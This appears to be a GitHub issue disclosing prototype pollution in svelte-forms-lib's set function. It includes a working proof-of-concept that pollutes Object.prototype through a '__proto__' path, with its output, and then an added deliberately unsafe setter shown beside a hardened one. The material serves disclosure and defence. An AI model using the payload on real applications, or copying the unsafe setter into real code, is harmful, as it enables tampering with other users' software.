svelte-forms-lib

Prototype Pollution

Open ready-research opened this issue 3 years ago • 0 comments

Summary

svelte-forms-lib package is vulnerable to Prototype Pollution. The set function fails to validate which Object properties it updates. This allows attackers to modify the prototype of Object, causing the addition or modification of an existing property on all objects.

Reported in huntr: https://www.huntr.dev/bounties/69aa6433-5e43-4a2c-a4e1-3671c255b11e/ (8 months ago). Please validate this using Mark as valid. Thanks.

Steps to reproduce

// poc.mjs
import {util} from 'svelte-forms-lib/lib/util.js';
const obj = {};
console.log("Before : " + {}.polluted);
util.set(obj, "__proto__.polluted", 'Yes! Its Polluted');
console.log("After : " + {}.polluted);

Result:

Before : undefined
After : Yes! Its Polluted

ready-research May 10 '22 10:05
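The Summary above attributes the bug to a set function that does not validate which properties it updates. The following is an added example, not part of the issue and not svelte-forms-lib's code: a constructed stand-in for an unvalidated path setter next to a hardened one that rejects prototype-reaching keys. The names `naiveSet`, `safeSet`, `parsePath`, `BLOCKED_KEYS` and `demo`, and the dot/bracket path grammar, are assumptions made for illustration.

```javascript
// Added example: naiveSet is a constructed stand-in, not the library's set().
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function parsePath(path) { // accepts "a.b[0].c" or an array of keys
  return Array.isArray(path) ? path.map(String) : String(path).match(/[^.[\]]+/g) || [];
}

function naiveSet(obj, path, value) {
  const keys = parsePath(path);
  let node = obj;
  for (const key of keys.slice(0, -1)) {
    if (node[key] === null || typeof node[key] !== 'object') node[key] = {};
    node = node[key]; // "__proto__" resolves to Object.prototype here
  }
  node[keys[keys.length - 1]] = value;
  return obj;
}

function safeSet(obj, path, value) {
  const keys = parsePath(path);
  if (keys.length === 0) return obj;
  if (keys.some((k) => BLOCKED_KEYS.has(k))) {
    throw new TypeError(`refusing to set unsafe path: ${String(path)}`);
  }
  let node = obj;
  for (const key of keys.slice(0, -1)) {
    // Descend only into own properties so inherited objects are never written to.
    const own = Object.prototype.hasOwnProperty.call(node, key);
    if (!own || node[key] === null || typeof node[key] !== 'object') node[key] = {};
    node = node[key];
  }
  node[keys[keys.length - 1]] = value;
  return obj;
}

function demo() {
  naiveSet({}, '__proto__.polluted', 'yes');
  const naivePolluted = {}.polluted === 'yes';
  delete Object.prototype.polluted; // undo the global side effect
  let safeRejected = false;
  try { safeSet({}, '__proto__.polluted', 'yes'); } catch (e) { safeRejected = e instanceof TypeError; }
  const safePolluted = 'polluted' in {};
  return { naivePolluted, safeRejected, safePolluted, nested: safeSet({}, 'user.address.city', 'Oslo') };
}
```

Rejecting the three keys at the path level covers both the `__proto__` route shown in the PoC and the `constructor.prototype` route to the same object.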